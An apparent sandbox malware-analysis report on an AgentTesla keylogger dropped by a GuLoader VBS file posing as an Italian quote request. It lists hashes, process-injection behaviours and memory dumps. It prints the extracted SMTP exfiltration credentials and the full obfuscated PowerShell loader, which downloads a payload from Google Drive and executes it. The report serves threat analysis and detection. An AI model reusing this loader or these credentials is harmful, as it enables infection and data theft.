agenttesla | 451a0de15470d3acfe3e3d546462ac55676d806336d3452ac1bc7ffe6f47cfd4

General

Target

Richiesta di preventivo_RFQ20242703_pdf.vbs
Size

38KB
MD5

883530fd75a356dad534bdb7aa39e947
SHA1

2f7cd81fb69b269273068bc97a012216f67e35d0
SHA256

5212ef58efb4b855a2aaf4bbaf81a4912810982631e2afaf246963fea954fe64
SHA512

53d804000f64091fd407747262d011c5d73d892be9cf137d1466bd4150bebb0851fdc11e6937163e845ec3cb7e6929e10e8601833d20fa75e126dbf1a2f46362
SSDEEP

768:u0ygBLXWAZGc8NnKwiQ6x/dSNQT1AOBG/m:Z3qNnKwKLTBB

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.tecniseal.es
Port:
587
Username:
[email protected]
Password:
12348*tecniseal
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
11 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2384 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2792 powershell.exe
2384 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2792 set thread context of 2384 2792 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2440 powershell.exe
2792 powershell.exe
2792 powershell.exe
2384 wab.exe
2384 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2792 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2440 powershell.exe
Token: SeDebugPrivilege 2792 powershell.exe
Token: SeDebugPrivilege 2384 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
11	drive.google.com

pid	process
2384	wab.exe

pid	process
2792	powershell.exe
2384	wab.exe

description	pid	process	target process
PID 2792 set thread context of 2384	2792	powershell.exe	wab.exe

pid	process
2440	powershell.exe
2792	powershell.exe
2792	powershell.exe
2384	wab.exe
2384	wab.exe

pid	process
2792	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2384	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2428 wrote to memory of 2440	2428	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2440	2428	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2440	2428	WScript.exe	powershell.exe
PID 2440 wrote to memory of 2860	2440	powershell.exe	cmd.exe
PID 2440 wrote to memory of 2860	2440	powershell.exe	cmd.exe
PID 2440 wrote to memory of 2860	2440	powershell.exe	cmd.exe
PID 2440 wrote to memory of 2792	2440	powershell.exe	powershell.exe
PID 2440 wrote to memory of 2792	2440	powershell.exe	powershell.exe
PID 2440 wrote to memory of 2792	2440	powershell.exe	powershell.exe
PID 2440 wrote to memory of 2792	2440	powershell.exe	powershell.exe
PID 2792 wrote to memory of 268	2792	powershell.exe	cmd.exe
PID 2792 wrote to memory of 268	2792	powershell.exe	cmd.exe
PID 2792 wrote to memory of 268	2792	powershell.exe	cmd.exe
PID 2792 wrote to memory of 268	2792	powershell.exe	cmd.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe
PID 2792 wrote to memory of 2384	2792	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Richiesta di preventivo_RFQ20242703_pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Brasekartoffel Hygiejnebindets Bruttoindtgt Wended Nulpunktskonturen Filmoptagelsen Topviewet #>;$Petrogeny=(cmd /c set /A 115^^0);Function Droslendes ([String]$Beskaarede){$Banklaanet=[char][int]$Petrogeny+'ubstring';$Dommerkomitwuernes=8;$Malenes=sergeants($Beskaarede);For($Hybridernes=7; $Hybridernes -lt $Malenes; $Hybridernes+=$Dommerkomitwuernes){$Xyloplastic=$Beskaarede.$Banklaanet.Invoke($Hybridernes, 1);$Forkantens=$Forkantens+$Xyloplastic;}$Forkantens;}function burgul ($Farveindstillinger){. ($Forsiden) ($Farveindstillinger);}function sergeants ([String]$genopliv){$Kvrulantens=$genopliv.Length-1;$Kvrulantens;}$Besaint=Droslendes 'Konve,sTmatrilirFredsomaOrangutnUdlbsdas SchwarfMollbereVal.endrSmagendrB ntinpiUnflashn SensobgChicane ';$Afklingers=Droslendes 'NonprovhUncollat ,sychot isenapAflokkesMelopoe:Rationa/Suborns/ArvieindLogomacrAnchorsi Pro,ravGammerse Priori.Receptag kil eso Celtido UnlenggSemicarl,vovlineHypoc.i.LexicogcSystemko Velso m Feltln/ShoosnouRacistcclegione?PreexcheUnlustrx MultilpUdlove o ,heepbrCommunit heafsk=A pehuedtmrerreoJvningewAva cesn HandellAldennooSynkr,taU.sgendd angene&.warmeriPolys.ndPostpra=Antepec1 GoggleDId ophoLPogomsonGraadsahB oscieLDatadisWkee lesFAlltudhvSyrendei Lavishl Sp.ddiyJobbeskjHulkageaNonr depSansenduiodinesS.sideriVWanderai Roupi 0AzotinrRmisinfeBUnderlaeAltsaasHTapioc.zS partea UigennQTakstreqBinderii Vandelr PrepotqColluto4Sanktio7Tealeaf ';$Forsiden=Droslendes 'ZephyryiEternale AristoxFre.sfl ';$Conch=Droslendes 'Sels,er$Beverelg SkysailF rktreoCentr lbKu.enaiaSkjaldelAr,ejds:TossehoaProdigis EsugarsSilkeoro S,ittirUd eligtGlu,ingmirreleveNonexotnUnnom dtSugg stsEndeb,l Toxoglo= rtekrm UnspoilS HngepatBegatsfaCarlylerForskudt Overf -PapirprBS alemaiVandlbetStemmelsbisyllaTFormskrr BrovteaSmidesin FricassIsthmgofNdskrigeBefallsrEkspatr Student-kl dderSReeksamoEl ctrouA.pendir AntenncFrostereDe niks Projekt$ NearsiAKastedefRe.doktkDikkerslLnnasmoiPre.oldnDel,hcygCarvisteliroconr U.simps Gardeh Disau h-eurovalD Epid meGennemssOmbygnit Saro.eiCoupfilnChavenoa anjahtUsurpatiEsrogimoSemihisnKorrump Surface$ ParaboF KontroeDelstatdKry,rinrCuitl no TerminnRelabelnBi,kebaidillonpnFlydespgRen saneMusselmr IndtgtnUnpropoeAbscoun ';burgul (Droslendes 'Ana.tas$ C,enulgUdsmug lGarnettoO,priorbPeriphya AtollelTralati: ItchprFDisgruneglobalsd BalancrFor ngeoBenfisknKitanfonSu.ringiUhla ssn Bour ug FloodweS angetrOp edwan.verelee,karpsk=Refleks$ UnnisveIndtraen Frith,vplasmom:.eteromaKend rep Exor bpBarytondXeronica Preag.tNonsuccaAndend. ') ;burgul (Droslendes 'Abor,enIKlikkedmDiffu,dpMolbohioUndightrOverlyetBruiser-GeschftMSei.eduo AbtegndDu,lifyuC locynl TffeldeFortstt HovelliBRub,iciiGodsvogt.tatampsViaduktTGeopolarMaza,ecaTheophinOrdrebes Inter,fGlossiee ContrarHamster ') ;$Fedronningerne=$Fedronningerne+'\Gudfrygtigst.Asa' ;burgul (Droslendes 'Bucerot$ SydvesgOblivial d,reryoLatexosbBetutoraRhombo.lClunt r:Ora gesPEmneomry HomoeojFormbrnaPlejemdm Huldtra SyreresAnskaffsKnstte.eSegr.garUddrcasnuns ynee.osterf=.leakol(Bouche.T Ensst.eForldresNewfishtJulekak-DaresaqPServiceaAtredent yrefgth Preenv Eksport$DestabiFL.kerine Reca,cdSnit,aprFlydereoGowdco.nPre arrn NitrogiD.ammonn SpecifgSporvogeMisimprr CaractnOfficele Outeat)Trepunk ') ;while (-not $Pyjamasserne) {burgul (Droslendes 'AssumabI BestikfStvnemd Kattepo(Vrdibre$OutdrawaGoldheasBo labls Velp,ooR.vilemrAutoboat BagtalmRingvejeIsenthanParaphrt macrocsFibroid.IneffecJStrmforoAnhold bH,icksnSCoriaretSlingriavalk.jotKok,tteeCo.merc Sissify- ThoraxeAssorteqpreder. Tyskern$ TranslBAnalfaseSundheds ForrinaStimeriiGavenranR.dbudstSidespo)Miscast Tr nebr{GuitarlSMisapplt PalpebaEf.erberVariocotAltoget-Ad,esseSAt loprlmobil,seSpandenePegglepp,krutsp Sams.ni1Blackey}UnderwreFantas,lPretabusIndgaase Ik,ngl{VizardiSTran.patsturninaUstyrlirObvioustFeminis-BoloneyS S.aughlBetonb.e ormodaeProjektp V king Uddr.vr1 Fanger; Ingu nbTrkgarduUmennesrTidskongprecedauSolidl lBeefsli Septend$CensoraCSkogredoOvermasn.ernaldcAmandushScop lo}avisled ');burgul (Droslendes 'Terrass$Ballettg Gstep.lMonoc,roGrafiktb A.lggea Efiktrl emono:VinkletPFremda yBeklagejOrdonnaaGennemvm efeatmaHodskilsM psatossp.llereHampsmarElverpinSki tereslagtek=monarc,(EnkeltfTUnsmeareTheopnesKoldtvatIsoseis-Dukkes PBreakouaElixatetElementhUterove Plagier$TppefliF Fr gtee Blegn,d.ndosedrForsig.oJ bilern WaywodnD.ssinai On,chonSc,iztig Globale,uccumbrSublimanGe beobeKonsumf) Cernin ') ;}burgul (Droslendes 'Distrib$BarogragSpdbrnslPalatogoPreindubMedicinaSkaaninlKennyha:PrecordBInscribeAttenaafAcronfrrTitubatuInvalidgOpsa,setMiljmi.e antidsdOrganote A,pidos Parcpr Dekrem=Ma dake K,libakGUnfavoreAversekt,aftyvn-FjumrehCBevgeapoKendingn letrent BordereEquivocnElsko stAgrisem Konserv$ RundowFPerlineeSupersedT.imklarAdresseoStregten TrkkornSc.eeviiKaa,dennEosphorgSlagteheT rraperAdulatinnondebieArachni ');burgul (Droslendes 'Fanglin$ AutophgBio dinlC.vatero Labialb BindinaProgramljannisa:IntoxicPCleadedrUnacquioLambdiodOverdefu RngninkProgramtKonkludi Subs soKandestnSolgerdsTalipatn Neptuno Be,arirVipper,mFrithioeFr,mtrdr.ampaninTornfugeChangem Resulta=Cyclohe S.ovfa[ZostersSSystemay .istrisSu cubatAr.illievinduesm.egions.SuccorlCSpilleroHopperbn RelativBasemaneChimpanrRaadendtForold,] Bismar: Turboe:DelinkvFMunkedarSu suitoFlaminem istempBDatamisa,ovsekas.iklingespide i6Sik,erh4PantsttSUndervitMagerner heatriMaltreantovedeigLu erne(Kvabsoe$ O ertaBBelss.deHuskelifLandvinrKonce.tuprovineg skrotnt M.gnete Anta odAdirondeRigshossHandels)Personl ');burgul (Droslendes 'Sinward$ RettetgSlambe.l MisvksoDimitteb CampinaKonvekslBib iot:.lagtekGHandelso S,liloaMadrasslou.snata ibensgNodosareQuadrib Svuppeb=Fugg ng Ejendom[TorleksSAflo,seyPianistsSteapsitTnkeredeunbraggm fstemn. lrervT WhitebeUerfarex Idea,etKvalmes.ObvunosEBlive dn ,pocalcFashionoOve.flodVendepuiacheronnHomeridg,rickin]Sem.niu:Launder:IndsamlATet achS A.precCEy,brigISolar lITropica.FilthatG InterneUdlstestSovsekaSMinuendt Tol terCopeck,iVandlbsnGenvalggGuver,a( Bleget$ SmeltePForgn.erOmdiskuoTopsytudR,bysmiu,aljoenk Accesst arfariforlagtoMa,stannBlindstsFastlggnLightmaoBen.endrD stinimT.rticoe OmraadrGuitaren Ka.toteSuper.e)Daarlig ');burgul (Droslendes 'Raadyrr$OvereasgDelgg ll RunestoCommunibRelaksaaUrteh.vlFleetfu:NascencL StikniaForspilaVredladnWhiteboeFunkti.lOveredioDisemedfClaxo atHeteroesSkarnbt= annerm$rgtersaG nconsioUnabettaElastomlDyadiskabecrushgPatienteQuass a. CircumsMicr,spulekturebTrans bsFria litG.mpetirKvadratiKewin an Paddehgpotetsf( Restan3Udskrif0Krab,te4 Enerv,8Litt.ns2 A soci0S.idigh,Normani3 Heinin1Antisco8T.anspa8Tikante6Water,a)samme,t ');burgul $Laanelofts;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2860

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Brasekartoffel Hygiejnebindets Bruttoindtgt Wended Nulpunktskonturen Filmoptagelsen Topviewet #>;$Petrogeny=(cmd /c set /A 115^^0);Function Droslendes ([String]$Beskaarede){$Banklaanet=[char][int]$Petrogeny+'ubstring';$Dommerkomitwuernes=8;$Malenes=sergeants($Beskaarede);For($Hybridernes=7; $Hybridernes -lt $Malenes; $Hybridernes+=$Dommerkomitwuernes){$Xyloplastic=$Beskaarede.$Banklaanet.Invoke($Hybridernes, 1);$Forkantens=$Forkantens+$Xyloplastic;}$Forkantens;}function burgul ($Farveindstillinger){. ($Forsiden) ($Farveindstillinger);}function sergeants ([String]$genopliv){$Kvrulantens=$genopliv.Length-1;$Kvrulantens;}$Besaint=Droslendes 'Konve,sTmatrilirFredsomaOrangutnUdlbsdas SchwarfMollbereVal.endrSmagendrB ntinpiUnflashn SensobgChicane ';$Afklingers=Droslendes 'NonprovhUncollat ,sychot isenapAflokkesMelopoe:Rationa/Suborns/ArvieindLogomacrAnchorsi Pro,ravGammerse Priori.Receptag kil eso Celtido UnlenggSemicarl,vovlineHypoc.i.LexicogcSystemko Velso m Feltln/ShoosnouRacistcclegione?PreexcheUnlustrx MultilpUdlove o ,heepbrCommunit heafsk=A pehuedtmrerreoJvningewAva cesn HandellAldennooSynkr,taU.sgendd angene&.warmeriPolys.ndPostpra=Antepec1 GoggleDId ophoLPogomsonGraadsahB oscieLDatadisWkee lesFAlltudhvSyrendei Lavishl Sp.ddiyJobbeskjHulkageaNonr depSansenduiodinesS.sideriVWanderai Roupi 0AzotinrRmisinfeBUnderlaeAltsaasHTapioc.zS partea UigennQTakstreqBinderii Vandelr PrepotqColluto4Sanktio7Tealeaf ';$Forsiden=Droslendes 'ZephyryiEternale AristoxFre.sfl ';$Conch=Droslendes 'Sels,er$Beverelg SkysailF rktreoCentr lbKu.enaiaSkjaldelAr,ejds:TossehoaProdigis EsugarsSilkeoro S,ittirUd eligtGlu,ingmirreleveNonexotnUnnom dtSugg stsEndeb,l Toxoglo= rtekrm UnspoilS HngepatBegatsfaCarlylerForskudt Overf -PapirprBS alemaiVandlbetStemmelsbisyllaTFormskrr BrovteaSmidesin FricassIsthmgofNdskrigeBefallsrEkspatr Student-kl dderSReeksamoEl ctrouA.pendir AntenncFrostereDe niks Projekt$ NearsiAKastedefRe.doktkDikkerslLnnasmoiPre.oldnDel,hcygCarvisteliroconr U.simps Gardeh Disau h-eurovalD Epid meGennemssOmbygnit Saro.eiCoupfilnChavenoa anjahtUsurpatiEsrogimoSemihisnKorrump Surface$ ParaboF KontroeDelstatdKry,rinrCuitl no TerminnRelabelnBi,kebaidillonpnFlydespgRen saneMusselmr IndtgtnUnpropoeAbscoun ';burgul (Droslendes 'Ana.tas$ C,enulgUdsmug lGarnettoO,priorbPeriphya AtollelTralati: ItchprFDisgruneglobalsd BalancrFor ngeoBenfisknKitanfonSu.ringiUhla ssn Bour ug FloodweS angetrOp edwan.verelee,karpsk=Refleks$ UnnisveIndtraen Frith,vplasmom:.eteromaKend rep Exor bpBarytondXeronica Preag.tNonsuccaAndend. ') ;burgul (Droslendes 'Abor,enIKlikkedmDiffu,dpMolbohioUndightrOverlyetBruiser-GeschftMSei.eduo AbtegndDu,lifyuC locynl TffeldeFortstt HovelliBRub,iciiGodsvogt.tatampsViaduktTGeopolarMaza,ecaTheophinOrdrebes Inter,fGlossiee ContrarHamster ') ;$Fedronningerne=$Fedronningerne+'\Gudfrygtigst.Asa' ;burgul (Droslendes 'Bucerot$ SydvesgOblivial d,reryoLatexosbBetutoraRhombo.lClunt r:Ora gesPEmneomry HomoeojFormbrnaPlejemdm Huldtra SyreresAnskaffsKnstte.eSegr.garUddrcasnuns ynee.osterf=.leakol(Bouche.T Ensst.eForldresNewfishtJulekak-DaresaqPServiceaAtredent yrefgth Preenv Eksport$DestabiFL.kerine Reca,cdSnit,aprFlydereoGowdco.nPre arrn NitrogiD.ammonn SpecifgSporvogeMisimprr CaractnOfficele Outeat)Trepunk ') ;while (-not $Pyjamasserne) {burgul (Droslendes 'AssumabI BestikfStvnemd Kattepo(Vrdibre$OutdrawaGoldheasBo labls Velp,ooR.vilemrAutoboat BagtalmRingvejeIsenthanParaphrt macrocsFibroid.IneffecJStrmforoAnhold bH,icksnSCoriaretSlingriavalk.jotKok,tteeCo.merc Sissify- ThoraxeAssorteqpreder. Tyskern$ TranslBAnalfaseSundheds ForrinaStimeriiGavenranR.dbudstSidespo)Miscast Tr nebr{GuitarlSMisapplt PalpebaEf.erberVariocotAltoget-Ad,esseSAt loprlmobil,seSpandenePegglepp,krutsp Sams.ni1Blackey}UnderwreFantas,lPretabusIndgaase Ik,ngl{VizardiSTran.patsturninaUstyrlirObvioustFeminis-BoloneyS S.aughlBetonb.e ormodaeProjektp V king Uddr.vr1 Fanger; Ingu nbTrkgarduUmennesrTidskongprecedauSolidl lBeefsli Septend$CensoraCSkogredoOvermasn.ernaldcAmandushScop lo}avisled ');burgul (Droslendes 'Terrass$Ballettg Gstep.lMonoc,roGrafiktb A.lggea Efiktrl emono:VinkletPFremda yBeklagejOrdonnaaGennemvm efeatmaHodskilsM psatossp.llereHampsmarElverpinSki tereslagtek=monarc,(EnkeltfTUnsmeareTheopnesKoldtvatIsoseis-Dukkes PBreakouaElixatetElementhUterove Plagier$TppefliF Fr gtee Blegn,d.ndosedrForsig.oJ bilern WaywodnD.ssinai On,chonSc,iztig Globale,uccumbrSublimanGe beobeKonsumf) Cernin ') ;}burgul (Droslendes 'Distrib$BarogragSpdbrnslPalatogoPreindubMedicinaSkaaninlKennyha:PrecordBInscribeAttenaafAcronfrrTitubatuInvalidgOpsa,setMiljmi.e antidsdOrganote A,pidos Parcpr Dekrem=Ma dake K,libakGUnfavoreAversekt,aftyvn-FjumrehCBevgeapoKendingn letrent BordereEquivocnElsko stAgrisem Konserv$ RundowFPerlineeSupersedT.imklarAdresseoStregten TrkkornSc.eeviiKaa,dennEosphorgSlagteheT rraperAdulatinnondebieArachni ');burgul (Droslendes 'Fanglin$ AutophgBio dinlC.vatero Labialb BindinaProgramljannisa:IntoxicPCleadedrUnacquioLambdiodOverdefu RngninkProgramtKonkludi Subs soKandestnSolgerdsTalipatn Neptuno Be,arirVipper,mFrithioeFr,mtrdr.ampaninTornfugeChangem Resulta=Cyclohe S.ovfa[ZostersSSystemay .istrisSu cubatAr.illievinduesm.egions.SuccorlCSpilleroHopperbn RelativBasemaneChimpanrRaadendtForold,] Bismar: Turboe:DelinkvFMunkedarSu suitoFlaminem istempBDatamisa,ovsekas.iklingespide i6Sik,erh4PantsttSUndervitMagerner heatriMaltreantovedeigLu erne(Kvabsoe$ O ertaBBelss.deHuskelifLandvinrKonce.tuprovineg skrotnt M.gnete Anta odAdirondeRigshossHandels)Personl ');burgul (Droslendes 'Sinward$ RettetgSlambe.l MisvksoDimitteb CampinaKonvekslBib iot:.lagtekGHandelso S,liloaMadrasslou.snata ibensgNodosareQuadrib Svuppeb=Fugg ng Ejendom[TorleksSAflo,seyPianistsSteapsitTnkeredeunbraggm fstemn. lrervT WhitebeUerfarex Idea,etKvalmes.ObvunosEBlive dn ,pocalcFashionoOve.flodVendepuiacheronnHomeridg,rickin]Sem.niu:Launder:IndsamlATet achS A.precCEy,brigISolar lITropica.FilthatG InterneUdlstestSovsekaSMinuendt Tol terCopeck,iVandlbsnGenvalggGuver,a( Bleget$ SmeltePForgn.erOmdiskuoTopsytudR,bysmiu,aljoenk Accesst arfariforlagtoMa,stannBlindstsFastlggnLightmaoBen.endrD stinimT.rticoe OmraadrGuitaren Ka.toteSuper.e)Daarlig ');burgul (Droslendes 'Raadyrr$OvereasgDelgg ll RunestoCommunibRelaksaaUrteh.vlFleetfu:NascencL StikniaForspilaVredladnWhiteboeFunkti.lOveredioDisemedfClaxo atHeteroesSkarnbt= annerm$rgtersaG nconsioUnabettaElastomlDyadiskabecrushgPatienteQuass a. CircumsMicr,spulekturebTrans bsFria litG.mpetirKvadratiKewin an Paddehgpotetsf( Restan3Udskrif0Krab,te4 Enerv,8Litt.ns2 A soci0S.idigh,Normani3 Heinin1Antisco8T.anspa8Tikante6Water,a)samme,t ');burgul $Laanelofts;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:268

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7d083275dea78fe047446186909bcdbd

SHA1
e1ebe3dc8d6212c1e4c0e01ca38f79d310242b03

SHA256
845758bf8a681208fc46e1bd5615968d97f5d0f822338a9e4efd4ecf9517aade

SHA512
dbcd938794a52195387550e8b2f2c8c493256249f776e04e2ea34181a0ff2deb5e82a47a04881edb98bf75cf6a98dd1891ad5562b995afbddee90651a6f35953

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCDCA.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EOV0XRLGBW250IEYHLBB.temp
Filesize
7KB

MD5
52c2269abb34574a423f41d490d4f2bf

SHA1
fb55f15c8be75646413e2d95d3c88ed012dcfcf9

SHA256
53b382583719c951a8663a1af43b4f7c495990c2e83babcc0baaa9db8eef9fe8

SHA512
9dbc367f46cf108f18a4636dc2d9429a6a3eae7598e4b879de5cdb7a7e7e491ee260506545ae2d61ee64946ea6768d0bdb1f45c2a063dd0af5543948b19fc653

Download Submit
memory/2384-51-0x0000000077290000-0x0000000077439000-memory.dmp

Filesize
1.7MB

Download
memory/2384-52-0x00000000774B6000-0x00000000774B7000-memory.dmp

Filesize
4KB

Download
memory/2384-53-0x0000000077480000-0x0000000077556000-memory.dmp

Filesize
856KB

Download
memory/2384-49-0x0000000001E40000-0x0000000004170000-memory.dmp

Filesize
35.2MB

Download
memory/2384-76-0x0000000000DD0000-0x0000000001E32000-memory.dmp

Filesize
16.4MB

Download
memory/2384-77-0x0000000077480000-0x0000000077556000-memory.dmp

Filesize
856KB

Download
memory/2384-80-0x0000000000DD0000-0x0000000000E10000-memory.dmp

Filesize
256KB

Download
memory/2384-82-0x000000006ECD0000-0x000000006F3BE000-memory.dmp

Filesize
6.9MB

Download
memory/2440-10-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-12-0x0000000002470000-0x0000000002482000-memory.dmp

Filesize
72KB

Download
memory/2440-15-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-19-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-14-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-13-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-81-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-16-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-11-0x00000000029E0000-0x0000000002A02000-memory.dmp

Filesize
136KB

Download
memory/2440-9-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-8-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-4-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/2440-7-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2440-6-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-5-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/2792-37-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-42-0x00000000051A0000-0x00000000051A1000-memory.dmp

Filesize
4KB

Download
memory/2792-43-0x00000000064D0000-0x0000000008800000-memory.dmp

Filesize
35.2MB

Download
memory/2792-44-0x00000000064D0000-0x0000000008800000-memory.dmp

Filesize
35.2MB

Download
memory/2792-45-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-46-0x0000000005DE0000-0x0000000005EE0000-memory.dmp

Filesize
1024KB

Download
memory/2792-47-0x0000000077290000-0x0000000077439000-memory.dmp

Filesize
1.7MB

Download
memory/2792-48-0x0000000077480000-0x0000000077556000-memory.dmp

Filesize
856KB

Download
memory/2792-41-0x0000000005DE0000-0x0000000005EE0000-memory.dmp

Filesize
1024KB

Download
memory/2792-40-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-39-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-38-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-36-0x00000000732D0000-0x000000007387B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-35-0x00000000732D0000-0x000000007387B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-23-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-24-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-78-0x00000000732D0000-0x000000007387B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-79-0x00000000064D0000-0x0000000008800000-memory.dmp

Filesize
35.2MB

Download
memory/2792-22-0x0000000002470000-0x00000000024B0000-memory.dmp

Filesize
256KB

Download
memory/2792-21-0x00000000732D0000-0x000000007387B000-memory.dmp

Filesize
5.7MB

Download
memory/2792-20-0x00000000732D0000-0x000000007387B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing